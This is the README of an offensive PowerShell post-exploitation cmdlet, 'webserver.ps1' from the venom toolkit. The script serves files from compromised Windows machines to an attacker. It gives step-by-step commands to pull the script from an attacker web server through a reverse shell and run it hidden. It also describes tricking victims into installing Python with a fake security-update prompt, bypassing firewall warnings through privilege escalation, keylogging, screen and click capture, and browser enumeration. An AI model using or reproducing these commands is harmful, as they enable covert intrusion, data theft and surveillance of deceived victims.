cmdlet to download files from compromised target machine
SYNOPSIS'cmdlet to read/browse/download files from compromised target machine (windows)'.
Author: r00t-3xp10it (SSA RedTeam @2020)
Tested Under: Windows 10 - Build 18363
Required Dependencies: python (http.server)
Optional Dependencies: curl|BitsTransfer
PS cmdlet Dev version: v1.17
[1] - The Reason Why
[2] - Cmdlet Description
[3] - Cmdlet Parameters
[4] - Remarks|Final Notes
[5] - Download Cmdlet
[6] - Get-Help Cmdlet
[7] - Report Issues
venom amsi evasion agents are reverse tcp shell's written in diferent languages ( PS | Python | C-exe ).
Thats means attacker gets back a 'cmd prompt' to interact with remote system. A fews days ago in a github
conversation @europol have ask me how to download files from compromissed machine using shell access ?
'Because many of the native tools installed required some type of authentication or administrator privileges' ..
My response: Use python http.server (userland) on target machine to build an webserver, and then access it on
attacker web browser to be abble to read/download/browse directorys. <= REMARK: http.server its limited to
what he can do derivated to remote dir ACL permissions (R)(W)(F) attributes. (depending of shell privileges)
His response: And if target machine does not have python (http.server) installed ??
My response: Use Social Engineering technic to trick target user into installing python..
Final Notes: webserver.ps1 IF executed through powershell -WindowStyle Hidden parameter then it will execute in an hidden terminal, and the only thing target user see's its the MsgBox Alerting for one python security update available (pending) and the python windows installer spawning from time to time ([<-SForce>][<-STime>] configurated loops). IF target system has python installed then webserver only executes the server silent without any interaction with target or any terminal popup's
If executed with administrator privileges then this cmdlet add's one firewall rule to allow server silent connections
IF the shell does not have admin privileges, then 'ComputerDefaults.exe' EOP will be used to create the firewall rule
If you wish to manual delete the firewall rule: netsh advfirewall firewall delete rule name="python.exe" (admin)
[^] - Jump to Top
This cmdlet has written to assist venom amsi evasion reverse tcp shell's (agents) with the ability to download files from target machine. It uses social engineering to trick target user into install Python-3.9.0.exe as a python security update (if the target user does not have python installed). This cmdlet uses curl|Start-BitsTransfer native binary (LolBins) to download the python windows installer from www.python.org - The follow 4 steps describes how to use webserver.ps1 on venom reverse tcp shell's
1º - Place this cmdlet in attacker machine apache2 webroot (bash prompt)
cp venom/aux/webserver.ps1 /var/www/html/webserver.ps1
2º - Then upload the webserver using the reverse tcp shell prompt
cmd /c curl http://LHOST/webserver.ps1 -o %tmp%\webserver.ps1
3º - Now remote execute webserver using the reverse tcp shell prompt
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SForce 3 -SEnum Verbose
4º - In attacker PC access 'http://RHOST:8086/' (web browser) to read/browse/download files.
** Advantages Of using this script insted of executing: python -m http.server LHOST LPORT on reverse shell prompt **
1º - This cmdlet uses Social Engineering technic to trick target user into installing python http.server (IF needed).
And has written to be one venom amsi evasion (handler) auxiliary with the obvious advantages (hidden execution)
And an abundance of post-exploitation functions available such as keyloggers, capture desktop screenshots, etc...
2º - This script executes the python process (python -m http.server) detach (background) from the parent process
Contrary to execute the command directly from the reverse tcp shell prompt that the only way to kill the server process
its to press CTRL+C directly from the reverse tcp shell prompt. <= This action will not only stops the server (python)
but it also stops our reverse tcp connection. Using webserver.ps1 script prevents this behavior because it runs the server
(python orphan process) and the @webserver.ps1 (powershell parent process) on diferent process thread's (detach).
3º - This cmdlet also allow users to capture screenshots of MouseClicks using the [<-SPsr>] parameter, with the
help of psr.exe native windows 10 (error report service) LolBin. Enumerates brower information using [<-SEnum>]
And Bypass remote firewall 'incoming connection' msg warnings (administrator or UserLand privileges on shell).
4º - This cmdlet allows server multiple sessions on diferent ports/directorys allowing us to have many server's working
[^] - Jump to Top
| parameter | description | type | default value |
|---|---|---|---|
| -SPath | webserver working directory absoluct path (remote) | string | "$Env:userprofile" |
| -SPort | webserver http port to use (recomended from 8080 to 8999) | int | 8086 |
| -SBind | webserver ip address to bind (localhost or Ip Address) | string | $null |
| -SForce | execute the python windows installer 'xx' number of times (loop) and check after each execution for python success installation to exit the loop function. OR exit loop IF the nº of attemps set by [<-SForce>] Parameter is reached |
int | 0 |
| -STime | execute the python windows installer with 'xx' delay time in between loops The delay time its set in seconds and adds extra 4 seconds to the total time. eg: -STime 26 (26+4=30) == Delay of 30 sec between each [<-SForce>] loop |
int | 26 |
| -SRec | Capture remote desktop screenshots before continue webserver execution. The screenshots will be saved on $Env:TMP remote folder for later review.Capture 5 remote desktop screenshots: .\webserver.ps1 -SRec 5 |
int | 0 |
| -SRDelay | Capture remote desktop screenshots with 'xx' seconds of delay between each capture taken (screenshot capture loop function) |
int | 2 |
| -SPsr | Capture Screenshots of MouseClicks for 'xx' secondsRemark: 'The minimum accepted capture time its 8 seconds'. Capture userclicks + screenshots for 8 seconds: .\webserver.ps1 -SPsr 8 |
int | 0 |
| -SEnum | Remote Host Web Browser Enumeration DHCP, User-Agent, Default Browser, TCP Headers, TCP connection Active Tab Title, default browser install path, browser version, etc. Enumerate Browser settings: .\webserver.ps1 -SEnum True Agressive (verbose) enumeration .\webserver.ps1 -SEnum Verbose |
string | False |
| -Sessions | Enumerate/Kill active @webserver sessions This parameter can not be used together with other parameters Enumerate active sessions: .\webserver.ps1 -Sessions List Stop session by is PID identifier: .\webserver.ps1 -Sessions 1234 |
string | False |
| -SKill | Kill python (@webserver) remote proccess(s) in 'xx' seconds This parameter can not be used together with other parameters Kill the webserver in 2 seconds: .\webserver.ps1 -SKill 2 |
int | 0 |
| -Download | Downloads File from attacker apache2 webroot to @webserver remote working directory (Remark: 'Double quotes are mandatory in value inputs') This parameter can not be used together with other parameters Syntax: .\webserver.ps1 -Download "<apache2-IP>,<FileName.ps1>" Download File: .\webserver.ps1 -Download "192.168.1.73,Client.ps1" |
string | False |
| -Keylogger | Capture remote host keystrokes ($Env:TMP\void.exe|void.log) Capture remote host keystrokes: .\webserver.ps1 -Keylogger Start Stop keylogger process and delete files: .\webserver.ps1 -Keylogger Stop |
string | False |
| -EOP | Find missing software patchs for privilege escalation This parameter can not be used together with other parameters Find missing KB patchs: .\webserver.ps1 -EOP HOTFIXS Find missing software patchs: .\webserver.ps1 -EOP CVE Find Missing software Patchs and list KB: .\webserver.ps1 -EOP ALL |
string | False |
Some syntax examples.
powershell -W 1 -File "$Env:TMP\webserver.ps1"
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SPsr 25 -SBind 127.0.0.1 -SPort 8090
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SForce 3 -STime 6 -SRec 3 -SEnum True
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SPort 8111 -SPath "$Env:USERPROFILE\Desktop"
powershell -W 1 -File "$Env:TMP\webserver.ps1" -Download "192.168.1.73,Client.ps1"
powershell -W 1 -File "$Env:TMP\webserver.ps1" -Sessions List
powershell -W 1 -File "$Env:TMP\webserver.ps1" -SKill 2
- A List of cmdline commands (to execute in reverse tcp shell(s)) can be found
here
- IN [<-SPath>] parameter declarations its recomended the use of double "..." quotes.
- webserver.ps1 does not require admin privileges to work. (But its limited by
ACL permissions(R)(W))
- IF not set any ip address to bind [<-SBind>] Then webserver.ps1 auto-binds the target host ip address.
- All webserver.ps1 parameters are
NOT possitionalIt means that we can exec then in any order that we desire .. - The loop function stops
=>IF 'python installation its found'. OR=>IF the nº of attemps 'set by [<-SForce>] is reached' - In reverse tcp shell (handler) exec the webserver using:
eg. powershell -W 1 -File "$env:TMP\webserver.ps1"OR else.\webserver.ps1 [<-parameter>]command will NOT present any ouputs on reverse tcp shell handler.
[^] - Jump to Top
Wget Download|Manual download
wget https://raw.githubusercontent.com/r00t-3xp10it/venom/master/aux/webserver.ps1
Get-Help .\webserver.ps1 -full
URL: CmdLine & Scripts for reverse TCP shell addicts
[^] - Jump to Top